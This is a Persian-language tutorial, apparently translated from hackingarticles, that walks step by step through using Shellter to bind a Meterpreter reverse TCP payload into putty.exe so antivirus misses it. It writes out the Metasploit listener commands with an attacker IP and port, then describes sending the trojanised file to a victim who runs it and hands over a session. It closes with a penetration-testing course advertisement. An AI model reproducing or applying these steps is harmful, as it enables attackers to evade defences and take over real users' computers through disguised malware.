در این مقاله قصد داریم تا شما را با نحوه دور زدن آنتی ویروس با Shellter آشنا کنیم ابزار Shellter ابزاری است که با استفاده از آن می توان یک Payload را ایجاد کرده و سپس با استفاده از روش هایی که در Shellter وجود دارد می توان آنتی ویروس را بای پس کرد.
Shellter چیست؟
Shellter یک ابزار داینامیک درج یا الحاق Shellcode و ابزار هک آنتی ویروس است؛ که بهطور مؤثر یک shellcode را مجدداً encode میکند تا نرمافزار آنتیویروس (AV) را دور بزند. Shellter ثابت کرده که اولین آلودهکننده داینامیک برای فرمت فایل PE یا (Portable Executable) برنامههای ۳۲ بیتی ویندوز است ما از ابزار shellter برای هک آنتی ویروس استفاده میکنیم.
برای استفاده از هک آنتی ویروس Shellter میتوانید shellcode خود را ا با استفاده از Metasploit ایجاد کنید. Shellter یک برنامه ۳۲ بیتی ویندوزی و shellcode را بهگونهای تعبیه میکند که توسط نرمافزار AV شناسایی نمیشود.
نصب ابزار Shellter
نحوه نصب آن در کالی بهصورت زیر است.
نرمافزار wine32 را هم به شکل زیر دانلود و نصب کنید.
شروع کار با ابزار هک آنتی ویروس Shellter
بعد از باز کردن Shellter با استفاده ازwine از شما میخواهد حالت موردنظر را انتخاب کنید.
گزینه “a” را انتخاب کنید.
حالا باید یک فایل اجرایی را انتخاب کرده و در پوشه Shellter کپی کنید. این کار برای اتصال Shellter با یک فایل exe ضروری است. در اینجا ما فایل putty.exe را در پوشه Shellter کپی کرده و آن را به فایل نرمافزار Shellter پیوند میدهیم. زمانی که از PE Target خواسته شد، دستور زیر را تایپ کنید:
عملیات bind کردن شروع میشود.
برای ادامه کلید Enter را فشار دهید. ممکن است ببینید فایل DisASM.dll با موفقیت ایجاد شده است. حالت مخفی کردن را فعال کنید. سپس، از شما خواسته میشود که حالت مخفیکاری را فعال کنید، “y” را برای تائید وارد کنید.
صفحه فهرستی از payloadها را نشان میدهد. از شما میپرسد که آیا میخواهید از payloadهای فهرست شده استفاده کنید یا سفارشی. برای استفاده از payloadهای فهرست شده، “L” را تایپ کنید. سپس، از شما میخواهد که شماره payload موردنظر را از فهرست انتخاب کنید. شما میتوانید شماره موردنظر خود را انتخاب کنید. در این مورد ما ۱ را برای Meterpreter_Reverse_TCP انتخاب کردهایم.
سپس از شما خواسته میشود که LHOST و LPORT را تنظیم کنید. لوکال هاست و لوکال پورتی را که میخواهید session را روی آن انجام دهید وارد کنید. در این مورد ما، LHOST 192.168.1.109 [Attacker IP] و LPORT را بهعنوان ۴۴۴۴ تنظیم کردهایم. وقتی کلید Enter را فشار دهید، اطلاعات payload نمایش داده میشود.
یک پیام هشدار ظاهر میشود و بهمحض اینکه injection تأیید شد، از شما خواسته میشود برای ادامه، کلید Enter را فشار دهید.
اجرا کردن Listenser در Msfconsole
در یک ترمینال جدید msfconsole را تایپ کنید تا Metasploit framework راهاندازی شود و دستور زیر را اجرا کنید که یک listener است
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- <set lhost <IP
- <set lport <port-no
- exploit
فایل putty.exe را به سمت سیستم تارگت ارسال میکنیم. وقتی قربانی روی فایل putty.exe کلیک میکند که shellcode به آن bind شده قربانی به دام افتاده و ما یک meterpreter دریافت میکنیم.
meterpreter session باز میشود و دسترسی سیستم قربانی در اختیار ما قرار میگیرد.
این مقاله از منبع hackingarticles ترجمهشده است.
امیدوارم از مقالهی هک آنتی ویروس استفاده لازم را برده باشید. درصورتیکه علاقهمند به مباحث تست نفوذ شبکه هستید میتوانید در دوره های آکادمی تک وان ۲۴ شرکت کنید.